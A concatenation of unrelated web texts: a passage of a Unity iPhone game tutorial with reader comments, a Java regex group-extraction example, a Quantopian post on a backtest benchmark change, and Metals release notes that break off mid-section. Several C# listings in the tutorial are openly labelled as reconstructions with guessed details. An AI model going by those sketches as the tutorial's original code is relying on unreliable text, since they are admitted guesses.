You might want to have a look at the source code – but it’s actually boilerplate which loads the Mono framework, included as a few chunky dll files, plus some assets, so there’s not much you can play with. You have 2 targets, so make sure your iOS device is plugged in and select the “Unity-iPhone” target and your device. (I can’t make the Simulator target run; if you can, great, but for now I’ll stick to the device.)

Moment of truth – hit the Run button, and your Unity project now runs on your iPhone! Good job – you can see the default Unity start screen and then just the blue background of your scene (and the words “trial version” in a corner). Stop the Run task, switch back to Unity, and save your project.

Setting up the Scene

First let’s set up the main camera on the scene. Select “Main Camera” in “Hierarchy”; in the Inspector, find “Projection” and set it to “Orthographic”, set “Size” to “10”, and in Clipping Planes set “Near” to “0.5” and “Far” to “22”. Now you see a box near your camera inside the scene – these are the bounds of what will be visible on the screen from your world. Notice we’ve set the camera projection to “Orthographic” – this means the depth coordinate won’t affect how things look on the screen – we’ll effectively be creating a 2D game. For the moment let’s work like that until you get used to Unity; then we’ll switch to 3D projection.

Set your camera position (in the Inspector) X, Y and Z to [0,0,0]. Note that from now on, when I write “set position to [x,y,z]”, just set the 3 values in the 3 boxes for that property. Right-click in the Project panel and again choose “Create/Folder”; call the new folder “Textures”. Then download this background image I’ve put together for the game and save it somewhere on your disk. Drag the background image from Finder and drop it onto the “Textures” folder you just created.
It takes a good 20 seconds on my iMac to finish the import, but when it’s done, open the folder, select the “background” texture, and in the Inspector look at the texture’s properties. At the very bottom, the preview panel says “RGB Compressed PVRTC 4 bits.” Hmmm, so Unity figured out we’re importing a texture and compressed it on the go – sweet!

From the menu choose “GameObject\Create other\Plane” and you will see a blue rectangle next to the camera. This is the plane we just added to the scene; we’re going to apply the texture we’ve got to it. Select “Plane” in the Hierarchy panel; in the Inspector, in the text field at the top where it says “Plane”, enter “Background”. This changes the object’s name – this is how you rename an object. Drag the “background” texture from the Project panel and drop it onto the “Background” object in Hierarchy. Set the position of the plane in the Inspector to [4, 0, 20], the Rotation to [90, 180, 0] and the Scale to [10, 1, 5] – as you can see in the “Scene” panel, this scales and rotates the plane so that it faces the camera – this way the camera will see the plane as the game’s background.

Now, in order to see clearly what we have on the scene, we’ll need some light (much as in real life) – choose “GameObject\Create other\Directional Light” – this will put some light on your scene. Select Directional Light in “Hierarchy” and set its Position coordinates to [0, 0, 0]. Now we have all the setup and the background of the scene; it’s time to add some objects and make them move around!

Adding 3D Objects to the Scene

From the menu choose “GameObject\Create other\Cube” – this adds a cube object to your scene. This will be the game player, so rename it to “Player”. Set the following position: [-15, 5.3, 8]. You’ll see the cube appearing near the left side of the screen in the “Game” panel – this is where our plane will start, and it will move over the sea surface to the other end of the screen. Now let’s import the plane model!
We’ll be using free 3D models produced by Reiner “Tiles” Prokein and released for free on his website (also have a look at his license for the models). To start, download his airplane model and unarchive the contents. Right-click inside the “Project” panel and choose “Create/Folder”, and rename the folder to “Models”. From the folder where you unarchived the plane model, drag the file “airplane_linnen_mesh.obj” and drop it onto the “Models” folder in the “Project” panel. Then right-click the “Models” folder and choose “Create/Folder”, and rename the new subfolder to “Textures” – here we’ll save the textures applied to models. Drag the file “airplane_linnen_tex.bmp” and drop it onto the newly created “Textures” folder. Next, select the “Player” object in the “Hierarchy” panel and look in the “Inspector” – the “Mesh Filter” strip is the component which sets your object’s geometry (right now it sets a cube geometry). On the row saying “Mesh – Cube”, find the little circle with a dot in the middle and click it – this opens a popup where you should double-click the plane model, and this will change your object’s geometry to an airplane. Now one fine detail – the airplane looks a bit messed up. I’m no 3D expert, but I found what fixes this in Unity: select “airplane_linnen_mesh” in the “Project” panel, then in the “Inspector” find “Normals” and select “Calculate”, then scroll down and click the “Apply” button. Cool – now you see the smooth airplane in the scene! Let’s also apply its texture: drag the “airplane_linnen_tex” texture from your “Project” panel and drop it onto “Player” in the “Hierarchy” panel. Unity automatically applies the texture to the airplane model we have on the scene. Final touches for the airplane: on the “Player” object set Rotation to [0, 90, 350] and Scale to [0.7, 0.7, 0.7] – this will rotate and scale the plane so it looks like it’s flying just over the sea surface.
This game might not be Call of Duty quite yet, but stay tuned, because in the next section we’re going to make our airplane fly! :D

Beginning Unity3D programming with C#

As you’ve already seen in the Build Settings dialogue, Unity can build your project to a Wii game, an iPhone game, a standalone Mac game, and so forth. Because Unity is so omnipotent, it needs some kind of intermediate layer where you can program your game once, and each different build translates it to platform-specific code. So, oddly enough, to program in Unity you will be using C# (not Objective-C!), and when Unity generates your Xcode project it will translate that C# code to platform-specific code automatically! Right-click inside the “Project” panel and choose “Create/Folder”, and rename the new folder to “Class”. Right-click the “Class” folder and choose “Create/C Sharp Script”, and rename the new file to “PlayerClass”. Right-click inside the “Project” panel and choose “Sync MonoDevelop Project” – this opens the MonoDevelop IDE, where you can program in C#. Note: MonoDevelop is a program ported from Linux, as you can see by its Gnome-style user interface, so it’s normal if it crashes every now and then, especially when you try to resize the window. If that happens, just start it again by clicking “Sync MonoDevelop Project”. Here are the three major areas in the MonoDevelop GUI: - Your MonoDevelop project browser – in Assets/Class you will find your PlayerClass.cs file. - The currently open class outline. - The editor area – there’s some syntax highlighting and some auto-complete which will help you with coding. Find your PlayerClass.cs file in the project browser and double-click it to open it in the editor. Make sure that the class looks like the following: The “using” clause includes the given libraries and frameworks; UnityEngine is the library which gives you access to things like the iPhone’s accelerometer, keyboard input and other handy stuff.
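At this point PlayerClass.cs should simply be Unity's default C# script template – something like:

```
using UnityEngine;
using System.Collections;

public class PlayerClass : MonoBehaviour {

    // Use this for initialization
    void Start () {
    }

    // Update is called once per frame
    void Update () {
    }
}
```

If your file doesn't look like this, you can paste the skeleton above in before continuing.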
You define your new class and inherit from MonoBehaviour – this gives you lots of stuff for free: you can override a long list of methods which are called when given events are triggered. Just a few lines below you have empty Start and Update methods – these are 2 important events. - Start is called when your object appears on the scene, so you can do your initialization there (much like viewDidAppear: in UIViewController). - Update is called every time a frame is rendered (i.e. it could be 30, 60 or 100 times a second, you never know how often), and here’s where you do your movements, game logic, etc. Now let’s switch back to Unity for a moment. We want to make the airplane fly over the sea and, when it goes out of the right side of the screen, appear again from the left side. Let’s measure at what position we need to move the airplane to the left. In the “Scene” panel, at the top right corner, you see the orientation gizmo – click on the X handle (it’s a kind of red cone, I’ll call it a handle): This will rotate the scene and orient it horizontally towards you. Click again the handle which is now on the left side of the gizmo – this will rotate the scene around; you might need to click the left handle a few times until you see the scene head-on like this: Now you can use the mouse scroll wheel to zoom in/out on the scene and fit it inside the “Scene” panel. Make sure the move tool is selected in the toolbar above and select the “Player” in the “Hierarchy”. Now you see that a new gizmo has appeared, attached to the airplane, with green and red arrows. You can drag the arrows and they will move the airplane along the axis the arrows represent: What you need to do is grab the red arrow (horizontal axis) and drag the airplane to the right until it goes out of the “Game” panel below. So start dragging inside the “Scene” panel, but while looking at the “Game” panel. Leave the airplane just outside the visible screen and have a look at its position in the “Inspector”.
X should now be around “17.25” – so this is the right bound of the screen; you can drag the plane left and you’ll see the left bound is about “-17.25”, so we’ll use “18” and “-18” to wrap the airplane flight. Bring the airplane back to just about the left side of the screen, where it was before. Switch back to MonoDevelop, and make the following changes to PlayerClass.cs: As you already guessed, you just declared a public property on your class called “speed”, but what is unique to Unity is that all public class properties are also accessible via… the “Inspector” panel (ta-daaaah)! So you can set the values of your class properties from the IDE, and you can monitor the values of your properties while the game runs in real time – for free – how cool is that?! The “transform” variable is a property on every game object (and everything inside a scene is a game object) which handles the object’s placement in space: rotation, position, scale, etc. So on every Update call we translate the object’s position so that it moves to the right of the screen. We can’t just move the plane a set amount per call to Update, because nobody knows how many times this will actually be called per second. Instead, we define the speed in units per second, and multiply the speed by the amount of time elapsed since the last call to Update (Time.deltaTime). This way the object always moves at the same speed, independent of the current frame rate. The call to Translate takes 3 values – the translation it has to do on each axis. You probably noticed that we are moving the airplane on the Z axis (3rd parameter) – we have to do that because we rotated the plane on the scene, so translating along the Z axis moves it to the right from the perspective of the player! Look at the “if” statement – we check if transform.position.x is bigger than 18 (remember why?) and if so, we set the airplane’s position to the same coordinates but “-18” on the X axis.
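The listing itself got lost along the way, so here is a sketch of what PlayerClass.cs looks like at this stage, reconstructed from the description above (the exact field layout is my guess, but the speed property, the Translate call scaled by Time.deltaTime, the Z-axis movement, the 18/-18 wrap and the random speed are all as described):

```
using UnityEngine;
using System.Collections;

public class PlayerClass : MonoBehaviour {

    // public property: editable and watchable from the Inspector
    public float speed = 12f;

    void Update () {
        // move along the local Z axis (the plane is rotated, so Z is
        // "to the right" on screen); speed is units per second, so
        // scale it by the time elapsed since the last frame
        transform.Translate(0f, 0f, speed * Time.deltaTime);

        // wrap the flight: off the right side -> reappear on the left
        if (transform.position.x > 18f) {
            transform.position = new Vector3(
                -18f, transform.position.y, transform.position.z);
            // random speed between 8 and 12 keeps things interesting
            speed = Random.Range(8f, 12f);
        }
    }
}
```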
We use new Vector3(x, y, z) to set the position – we’ll be using a lot of these vectors for all positioning. You’ll notice we also set a random speed between 8 and 12 – this is just to make the plane move more randomly, to keep things interesting. At this point we are ready to see the airplane move! Switch back to Unity. Drag the “PlayerClass” from the “Project” panel onto “Player” in the “Hierarchy” panel – this way you attach the class to a game object. Select “Player” in “Hierarchy” and look in the “Inspector” – you’ll see a new strip has appeared called “Player Class (Script)”, where you also see your public property! Yay! Set a value of “12” for it. OK. Ready? Hit that Play button! Woot! You can see in both the “Scene” and “Game” panels that the airplane flies around, and when it goes out of the right side it comes back from the left side. Also notice in the “Inspector” that the X value of the position is live as well – it shows you where the plane is at any given moment. Also, Speed changes to a random value every time the plane’s flight wraps. Once you’re done enjoying this coolness, don’t forget to hit Play again to stop the game. Next up, time to give this plane a formidable foe – a menacing shark! Now that you’re familiar with the basics, things will go faster, since we won’t be doing anything new for a while. Need a break? We’ve covered a lot here! So if you get tired or just need to have a break, no problem – just save your Unity project and you can open it later. But! When you open a Unity project, it opens an empty scene by default. To load the scene you are working on, double-click “LevelScene” in the “Project” panel – now you can continue working.

Jumping the Shark

Go ahead and download and unarchive the Shark model. As you did before with the airplane, drag the file “shark.obj” onto the “Project” panel inside the “Models” folder and “sharktexture.bmp” inside “Models/Textures”. From the menu choose “GameObject/Create other/Capsule” and rename the “Capsule” object in “Hierarchy” to “Shark”.
In the “Inspector”, inside the “Mesh Filter” strip, click the circle with the dot inside, and in the popup window double-click the Shark model. Now you should see the Shark geometry in the “Scene” and “Game” panels. Drag “sharktexture” from the “Project” panel (it’s inside Models/Textures) onto the “Shark” object in “Hierarchy” – this gives your shark a vigorous mouth and some evil eyes! Phew – I already want to bomb it! Make sure “Shark” is selected and set the following properties in the “Inspector”: Position – [20, -3, 8], Scale – [1.2, 1.2, 1.2] – this will put the shark just off the right edge of the camera’s visible box – it’ll start moving from there towards the left side of the screen. Now, since we want the shark to interact with our bombs (by exploding, mwhahahahah!), we want the shark’s Collider to match the shark’s geometry more or less. As you can see, there’s a green capsule attached to the shark inside the scene. This is the shark’s collider. Let’s make it match this evil predator’s body. In the “Inspector” find the “Capsule Collider” strip and set the following values: Radius to “1”, Height to “5”, Direction to “X-Axis”, Center to [0, 0, 0]. Now you see the capsule collider has rotated and matches the shark’s body more or less – better! Last – select the “shark” model in the “Project” panel’s “Models” folder, then in the “Inspector” find “Normals” and select “Calculate”, then scroll down and click the “Apply” button. Right-click inside the “Project” panel in the “Class” folder and choose “Create/C Sharp Script”, and rename the new script to FishClass. Right-click and choose “Sync MonoDevelop Project”. MonoDevelop will pop up. Open the FishClass.cs file and put the following code inside: It’s pretty similar to what we already have for the airplane. We have a speed property (in units per second), and in the Update event handler we use transform.Translate to move the shark.
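The original FishClass listing didn't make it into this copy, so here's a sketch based on the behavior described in the text (the axis choices, the turn-around step and the random speed range are my guesses; the -30/30 bounds, the Rotate/Translate calls and the speed change are as described):

```
using UnityEngine;
using System.Collections;

public class FishClass : MonoBehaviour {

    // units per second, tweakable from the Inspector
    public float speed = 6f;

    void Update () {
        // passing 3 separate values instead of a Vector3 - same effect
        transform.Translate(0f, 0f, speed * Time.deltaTime);

        // at the -30/30 bounds: turn around, move a bit, pick a new speed
        if (transform.position.x > 30f || transform.position.x < -30f) {
            transform.Rotate(new Vector3(0f, 180f, 0f));
            transform.Translate(new Vector3(0f, 0f, 1f));
            speed = Random.Range(4f, 8f);
        }
    }
}
```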
Notice that this time I passed the translation to Translate as 3 separate values rather than a Vector3 – this is just to demo that some of these methods can take different parameters; however, passing 3 separate values or 1 vector is pretty much the same. Now let’s see what the shark does when it reaches the bounds of the screen (-30 and 30 in this case, so there is a moment when the shark is offscreen, and you can’t easily ambush it when it’s entering back). When the shark reaches the left or right bound, it turns around, moves a bit towards the bound, and changes speed. This way it just goes back and forth, back and forth, continuously. The call to transform.Rotate(new Vector3(x, y, z)) obviously rotates the object around the axes by the given values, and transform.Translate(new Vector3(x, y, z)) you already know well. Pretty easy! Switch back to Unity and drag the “FishClass” script onto the “Shark” object in “Hierarchy”. Now hit Play: you can see the huge shark going back and forth, waiting to be bombed. Good job!

Adding the Clown Fish

Let’s do the same procedure again for our ClownFish. I’ll put it into a nice list for quick reference: - Download and unarchive the ClownFish model. - Drag “mesh_clownfish.obj” into the “Project” panel inside the “Models” folder and “clownfish.bmp” inside “Models/Textures”. - Choose “GameObject/Create other/Capsule” and rename the “Capsule” object in “Hierarchy” to “ClownFish”. - Click the “Mesh Filter” circle-with-a-dot button and from the popup double-click the clownfish geometry. - Drag the “clownfish” model texture onto the “ClownFish” object in “Hierarchy”. - While having “ClownFish” selected, change the following properties in the “Inspector”: - Position to [-20, -1, 7] - Rotation to [0, 180, 0] - Scale to [0.4, 0.3, 0.3] - Radius to “4” - Height to “4” - Direction to “Z-Axis” - Center to [0, 0, 0]. Hit Play and see what happens – now you have two moving fish without having to write any extra code! Everything works perfectly – the fish go back and forth, the plane is wrapping. We need some boooombs!
Set Us Up The Bomb

Download and unarchive the Can model. As usual, drag the “colourcan.obj” file into the “Project” panel’s “Models” folder and the “cantex.bmp” file into “Models/Textures”. From the menu choose “GameObject/Create Other/Capsule”, and rename the object to “Bomb”. From the Mesh Filter popup double-click the can geometry. Drag the “cantex” texture onto the “Bomb” object in “Hierarchy”. In the “Inspector”, in the “Capsule Collider” strip, click the options button to open the popup menu: When the popup menu appears, choose “Reset” – this way the collider will automatically take the size of the assigned geometry – cool! Next, select the “colourcan” model in the “Project” panel’s “Models” folder, then in the “Inspector” find “Normals” and select “Calculate”, then scroll down and click the “Apply” button. Now let’s dive into new stuff! Select the bomb object again, and inside the Capsule Collider strip check the “Is Trigger” checkbox – aha! Checking this makes the bomb object trigger an event when it collides with other objects. But for this to happen we also need to assign a Rigid Body to the bomb (as at least one of the colliding objects needs to have a rigid body). From the menu choose “Component/Physics/Rigidbody” (Bomb should be selected in the Hierarchy!). Once you do this, a new strip should appear in the “Inspector” called “Rigidbody”. Uncheck “Use gravity” (we won’t use gravity) and check “Is Kinematic” to be able to control the body programmatically. That was all we needed to enable collisions! Download and save to your disc this bomb-releasing sound (which I made myself, lol!). We would like to play this sound when the airplane releases a bomb, i.e. when the bomb first appears on the screen. Let’s do that! Right-click in the “Project” panel and choose “Create/Folder”, and rename the new folder to “Audio”. Drag the “bahh1.aif” file onto the “Audio” folder. Next drag the “bahh1” sound file from the “Project” panel onto the “Bomb” object in “Hierarchy”.
Believe it or not, that’s all we need to do – the sound is attached to the bomb and will play when the bomb appears on screen. Notice how easy some things are with Unity? Select the “Bomb” object in “Hierarchy” and in the “Inspector” find the “Audio Source” strip: see that the “Play On Awake” checkbox is checked – this tells the audio to play when the object appears on the scene. Also look at the “Scene” panel – see that the bomb now has a speaker attached?

Prefabricating your Game Objects

Remember that “Hierarchy” shows what’s currently on the scene, and “Project” holds all your objects for you? This has something to do with our goal here – having many bombs loaded on the plane and releasing them at will into the sea. What we are going to do is prefabricate a game object (it will be ready and set to appear on the scene), but we won’t add it to the scene – we are going to instantiate (or clone, if you are a sci-fi fan) this “prefab” into a real living game object on the scene. Right-click inside the “Project” panel and choose “Create/Folder”, and rename it to “Prefabs”. Right-click “Prefabs” and choose “Create/Prefab”. Rename the new prefab to “BombPrefab”. Notice the little cube icon is white – this indicates an empty prefab. Now drag the “Bomb” from Hierarchy onto the “BombPrefab” in “Project”. Notice the cube icon is now blue – meaning a full prefab, ready to be cloned. Also important – look at the “Hierarchy” panel now – the “Bomb” label has changed to a blue color – that means this object is now an instance of a prefab. Now that we have our bomb cookie cutter set up, we don’t need the original bomb object on the scene – right-click on “Bomb” in “Hierarchy” and choose “Delete”. Let’s get coding! Switch to MonoDevelop and open up PlayerClass.cs. Under the “speed” property declaration add: Have you guessed already? In this property we’ll hold a reference to the BombPrefab, and we’ll make instances as we wish.
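The line to add is the prefab reference property – something like:

```
// reference to the bomb prefab; its value is set from the Inspector
public GameObject bombPrefab;
```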
Notice the property type is “GameObject” – as I said earlier, everything in the game is a GameObject (much like NSObject in Cocoa), so it’s safe to use that type for just about anything. Now switch back to Unity and select the “Player”. As you expected, in the “Inspector” under “Script” there’s a new property, “BombPrefab”. Let’s set its value: drag the “BombPrefab” from the “Project” panel onto the “Inspector” where it says “None (GameObject)” and drop it – now the field indicates it has the BombPrefab attached as its value. Cool! We’re also going to need a C# class for the bomb – right-click inside “Project” in the “Class” folder and choose “Create/C Sharp Script”, and rename it to “BombClass”. Right-click and choose “Sync MonoDevelop Project” – MonoDevelop pops up. Open up BombClass.cs and replace the contents with this code: This is pretty similar to everything we’ve done up to now – we translate the object every frame, and when it’s out of the screen bounds we react appropriately. In the bomb’s case we just want to destroy the object, since we can always make new ones from our bomb prefab. In the code, note that “this” refers to the C# bomb class, while the gameObject property refers to the object on the scene – so we destroy the object on the scene and all components attached to it. We’ll have a look at the game object hierarchy in Part 2, when you’ll access components attached to an object programmatically.

Bombing that shark!

Finally the part you’ve been waiting for – gratuitous violence! :] Open up PlayerClass.cs. At the end of the Update method add: Let’s go over this line by line. - Input is the class giving you access to the keyboard, mouse, accelerometer and touches. Input.anyKeyDown is true when a key is pressed; this happens only once – i.e. when the button was first pressed – then Input.anyKeyDown is false again until another key is pressed. anyKeyDown is a handy abstraction – it is actually true when a mouse button was clicked, a keyboard key was pressed or (!)
a tap on the iPhone’s screen was received. - (GameObject)Instantiate(bombPrefab) is the magic line that creates an instance from a prefab and adds it to the scene. - Finally, we set the position of the bomb to be the same as the airplane’s. Cool – we have our bomb created when the player taps the screen; it then starts to fall down, and when it’s out of the screen it destroys itself. Let’s give it a try! Switch back to Unity and hit Play – now if you click inside the “Game” panel (simulating a tap) you will see a bomb created where the plane is at that point. Click many times – many bombs are created. You should also hear the bomb sounds. But the bombs don’t fall down! Why? Can you figure out what the problem is by yourself? Answer after the break. I hope you figured it out, but here’s the problem: you haven’t yet assigned the BombClass script to the Bomb prefab – that’s why the bombs don’t fall down. Drag “BombClass” from your “Project” panel’s “Class” folder onto “BombPrefab” in the “Prefabs” folder in the same panel. Check in the “Inspector” that you see the Bomb Class (Script) strip. Now hit Play again. That’s better! Still not perfect though – those sharks don’t die when you hit them. Since we already configured the colliders and the rigidbody component of the bomb, we just need to add the code to react to the collision. Switch back to MonoDevelop and add this new method to the BombClass: Let’s go over the code line by line again: - OnTriggerEnter is a method called when the attached body collides with another body, and the 2nd body is passed as a parameter. - Here we check if the object the bomb hit is called “Shark”. - If the shark is hit, then first we reset the object’s rotation. - Second, we reset the shark back to its original position. - Finally, we call Destroy on this.gameObject to make the bomb disappear from the scene. Pretty easy again, isn’t it? That’s about all you need – switch back to Unity, and run your game! Hit sharks disappear and new ones come in.
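Since the listings for this section are missing here, this is a sketch of the bomb code pieced together from the description above (the fall speed, the -12 bottom bound and the exact way the shark is reset are my guesses; the name check, the [20, -3, 8] start position and the Destroy calls are as described):

```
using UnityEngine;
using System.Collections;

public class BombClass : MonoBehaviour {

    public float speed = 8f;

    void Update () {
        // the bomb falls straight down
        transform.Translate(0f, -speed * Time.deltaTime, 0f);

        // off the bottom of the screen: no respawn, just destroy it
        if (transform.position.y < -12f) {
            Destroy(this.gameObject);
        }
    }

    // called when our trigger collider intersects another collider
    void OnTriggerEnter (Collider other) {
        if (other.gameObject.name == "Shark") {
            // reset the shark's rotation and send it back to its start
            other.transform.rotation = Quaternion.identity;
            other.transform.position = new Vector3(20f, -3f, 8f);
            // and get rid of the bomb itself
            Destroy(this.gameObject);
        }
    }
}
```

And the lines added at the end of PlayerClass's Update method would look roughly like:

```
// in PlayerClass.Update(): drop a bomb on any key/mouse/tap
if (Input.anyKeyDown) {
    GameObject bomb = (GameObject)Instantiate(bombPrefab);
    bomb.transform.position = transform.position;
}
```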
You can also choose from the menu “File/Build&Run” and when Xcode pops up hit “Run” in Xcode – now you have the game on your iPhone – sweet!

Where To Go From Here?

Here is a sample project with all of the code from the above tutorial. I hope you amused yourselves and learned a ton of new things – in Part 2 of the series we’re going to spice things up a notch and make this game really challenging and fun! In the meantime, if you have any questions about this tutorial or Unity in general, please join the forum discussion below!

15 Comments

Awesome Tutor thank you I would have preferred 2.5D for Cocos2D but you can't please everyone. Someone always has to complain LOL Thanks.

Sample project is not complete, right? I failed to see the background in the Game view. Do I need to change Render Settings for this game?

Thanks! But one question : can we insert 3d animated models like a shark with a moving tail when he's swimming for more realistic gameplay. Thx again for all your great tutorials. P.S : There is a nice application we can found on the AppStore for simulating our games from Unity, it's called : Unity remote, so if you don't have a developing profile for testing the game on your iphone you can use this app, it's very easy to use.

Inserting animations within Unity is, from the little knowledge I have of the engine, quite simple. Check out where they have dozens of hours of free tutorials on Unity, they are very short and easy to pick up

I saw on your wife's blog that you are going to do a tutorial on how to make a catapult game that uses box2d physics similar to angry birds. I'm working on a game with similar functionality and just having a time. I've got lots of programming experience but am totally new to cocos2d and box2d and iphone/ipad development in general. I could really use that tutorial. Do you have any idea when the tutorial will be ready? Any available code at this time?
Specifically I'm interested in the parallax scrolling of the background, attaching the catapult to the world and how to move it with the revolute joint. Any help you can give me would be greatly appreciated. Thanks, Bob Hunt

Thanks Ray, I'm really looking forward to the tutorial. I love your book also. It's really helped me a lot. Take care, Bob Hunt

Is it possible to work on the Project in Unity from a Windows PC, then copy the project files over to a Mac and then build it for the iPhone? My MBP is quite old and very slow, I just had it crash on me when running Unity so I would rather try it on my workstation. But the deploying to my iPhone went fine. So I hope I can just copy the whole project across (or place it on a NAS from the beginning).

I do have a problem: after the first collision happens (the bomb is destroyed and the shark is reset), subsequent bombs do not collide with the shark. Why is that?

The nifty thing about the repo is that you can build both Android apks and iPhone ipas using command line tools. It's a nice start to automating the build. To do so (assuming a mac with xcode):

1) git clone
2) cd unity-shark-bomber
3) source scripts/envsetup.sh
4) hmm # this will give you help
5) sb-build-android # builds android apk (you may need to tweak the script a bit for your env)
6) sb-build-ios # builds ipa (you'll need to provide some env vars first. Run the script and it'll tell you what you need)

enjoy!

The tutorial works just fine for me.
http://www.raywenderlich.com/4551/how-to-make-a-2-5d-game-with-unity-tutorial-part-1
Problem: In a Java program, you need a way to extract multiple groups (regular expressions) from a given String.

Solution: Use the Java Pattern and Matcher classes, and define the regular expressions (regex) you need when creating your Pattern class. Also, put your regex definitions inside grouping parentheses so you can extract the actual text that matches your regex patterns from the String.

Example: How to extract multiple regex patterns from a String

In the following source code example I demonstrate how to extract two groups from a given String:

import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Demonstrates how to extract multiple "groups" from a given string
 * using regular expressions and the Pattern and Matcher classes.
 *
 * Note: "\\S" means "A non-whitespace character".
 * @see
 */
public class PatternMatcherGroupMultiple {

    public static void main(String[] args) {
        String stringToSearch = "Four score and seven years ago our fathers ...";

        // specify that we want to search for two groups in the string
        Pattern p = Pattern.compile(" (\\S+or\\S+) .* (\\S+the\\S+).*");
        Matcher m = p.matcher(stringToSearch);

        // if our pattern matches the string, we can try to extract our groups
        if (m.find()) {
            // get the two groups we were looking for
            String group1 = m.group(1);
            String group2 = m.group(2);

            // print the groups, with a wee bit of formatting
            System.out.format("'%s', '%s'\n", group1, group2);
        }
    }
}

With these two regular expressions, the output from this program is:

'score', 'fathers'

Discussion

The first regex ((\\S+or\\S+)) matches the word "score", and the second regex ((\\S+the\\S+)) matches the word "fathers". These two groups are extracted from the input String with these lines of code:

String group1 = m.group(1);
String group2 = m.group(2);

and are then printed with System.out.format. It’s also important to note that the find method will only succeed if both of these patterns are found in the String.
If only one regex pattern is found, find will return false. You can test this on your own system by changing one of the regex patterns to intentionally cause it to fail.
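For example, here's a small variation (the class name and the "xyz" regex are just for illustration) where the second group's pattern matches nothing in the string, so find returns false even though the first group's pattern would match on its own:

```java
import java.util.regex.Pattern;

public class GroupMatchFailure {

    // true only if the *whole* pattern (and therefore every group) matches
    static boolean bothGroupsFound(String regex, String text) {
        return Pattern.compile(regex).matcher(text).find();
    }

    public static void main(String[] args) {
        String text = "Four score and seven years ago our fathers ...";
        // the second group now requires "xyz", which is nowhere in the string,
        // so the overall match fails even though "score" is still present
        System.out.println(bothGroupsFound(" (\\S+or\\S+) .* (\\S+xyz\\S+).*", text));  // prints: false
    }
}
```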
https://alvinalexander.com/blog/post/java/how-extract-multiple-groups-patterns-string-regex/
Short version: We've changed the benchmark used in backtesting. When you re-run an algorithm through the backtester, you should expect different results for the benchmark and risk calculations.

Long version: A few months ago it was pointed out in this thread that we were using a price-based benchmark rather than a returns-based benchmark. When we thought about it, it was pretty clear we'd chosen the wrong one. If you're comparing your algorithm to a benchmark, you need to look at the returns of that benchmark. This evening we changed the benchmark being used in the backtester. The effect of this is that most backtest results will look a little different than they did before. The benchmark will look better, which means the algorithm results won't look comparatively as good, and the risk metrics driven by the benchmark will similarly be different. For short backtests, or backtests that didn't include a dividend date, there won't be a change. For an 11-year test, the difference is pretty significant. We know that having a stable backtester is important, and having an accurate backtester is also important. This is one of those times where the goals are in conflict, and being correct is more important than being consistent. We work very hard to make changes like this as unusual as possible. We're sorry for any inconvenience this change causes.

Example: The backtest below buys a bunch of SPY and holds it. You see the returns match pretty closely. The tiny differences in the returns are driven by the real-world effects of a strategy v. a benchmark. - The benchmark is assumed to be 100% invested at the market open, while the algorithm has to place an order in the first bar and be filled in the second bar. - The algorithm can't be 100% invested because it can't hold partial shares. It always has a small cash position, and that cash has 0% return.

Still to Come:
One of our highly-requested features is to make the benchmark customizable. This change we shipped today gets us a long way towards that – when we put in the new benchmark, we laid the foundation for future changes on the fly. I don't have a delivery target yet, but I'm hoping we can finish it sooner rather than later.

Edit 31-Jan-14: Shipped another version of the benchmark – the benchmark is now even closer to the fully-invested SPY return.

def initialize(context):
    context.spy = sid(8554)

def handle_data(context, data):
    # put all my money in SPY. rebalance as dividends come in.
    order_target_percent(context.spy, 1.0)
    if context.portfolio.cash < 10000:
        record(cash=context.portfolio.cash)
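To see why the price-based vs. returns-based distinction matters, here's a tiny standalone illustration (plain Python, not Quantopian/zipline code): a price-based benchmark ignores dividends entirely, while a returns-based benchmark compounds each period's total return (price change plus dividend), so they diverge the moment a dividend is paid.

```python
def price_based_return(prices):
    """Benchmark return computed from prices alone (ignores dividends)."""
    return prices[-1] / prices[0] - 1.0

def returns_based_return(prices, dividends):
    """Benchmark return compounding per-period total returns
    (price change + dividend paid that period)."""
    total = 1.0
    for i in range(1, len(prices)):
        total *= (prices[i] + dividends[i]) / prices[i - 1]
    return total - 1.0

prices = [100.0, 101.0, 100.0]
dividends = [0.0, 0.0, 2.0]  # a $2 dividend paid on the last day

print(price_based_return(prices))                 # 0.0 -- looks flat on price alone
print(returns_based_return(prices, dividends))    # ~0.02 -- the dividend counts
```

Over an 11-year SPY backtest, many such dividend dates compound, which is why the post describes the change as "pretty significant" for long tests.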
https://www.quantopian.com/posts/backtester-change-updated-benchmark
We're happy to announce the release of Metals v0.11.0! Due to the number of changes in this release we decided to introduce one more minor version before Metals 1.0.0, which is planned to come this year.

- Add CFR class file viewer.
- [Scala 3] Type annotations on code selection.
- Simplify usage of sbt server.
- Better support for mill BSP.
- Extract value code action.
- Add command to run current file.
- Support test explorer API.
- Add go to definition via links for synthetic decorations.
- Basic Java support.
- Add support for Scala 2.13.8.
- Reworked Metals Doctor.

Add CFR class file viewer

In addition to the recently added semanticdb, tasty and javap functionalities, thanks to the efforts of Arthurm1, it's now possible to decompile class files using Lee Benfield's CFR (Class File Reader). CFR decompiles class files to java, which is much more readable than using javap. In the future this might help in go to definition for jars that do not have a corresponding source jar, which is what Metals uses today. Editor support: VS Code, nvim-metals, Sublime Text. Extension authors: This can be added as a new command for the users to invoke.

[Scala 3] Type annotations on code selection

In one of the last releases, v0.10.8, we added the ability to inspect the type of an expression that is currently selected. We are happy to announce that this functionality is now also available for Scala 3, which is thanks to the continued effort of the team to bring the users the best Scala 3 experience possible. Editor support: VS Code, nvim-metals, Sublime Text

Simplify usage of sbt server

Previously, if you wanted to use sbt as your build server instead of the default Bloop, you'd need to ensure a .bsp/sbt.json file existed before you tried to switch your build server. We originally created the metals.generate-bsp command for this, but realized this potentially forced extra steps on the user.
To make this simpler, now even if no BSP entry exists for sbt and you attempt to switch your build server to sbt via the metals.bsp-switch command, we'll either use the existing .bsp/sbt.json file if one exists or automatically generate it for you (needs at least sbt 1.4.1) and then switch to it. Editor support: All.

Better support for mill BSP

Recently, Mill has completely revamped their BSP implementation, allowing for a much better experience for Metals users. Just like sbt, you can now use the metals.bsp-switch command to use Mill as your BSP server (needs at least Mill 0.10.0-M4). Keep in mind that the BSP support in Mill is still a work in progress. If you are interested in Mill BSP and you're a Metals user, feel free to include your input here, as they are requesting feedback on improving the experience. Editor support: All.

Extract value code action

In this release we introduce a new code action that allows users to automatically extract a method parameter to a separate value. For example, in an invocation such as:

@main def main(name: String) =
  println("Hello " + name + "!")

when the user invokes the new code action they will see:
Editor support: All

Add command to run current file

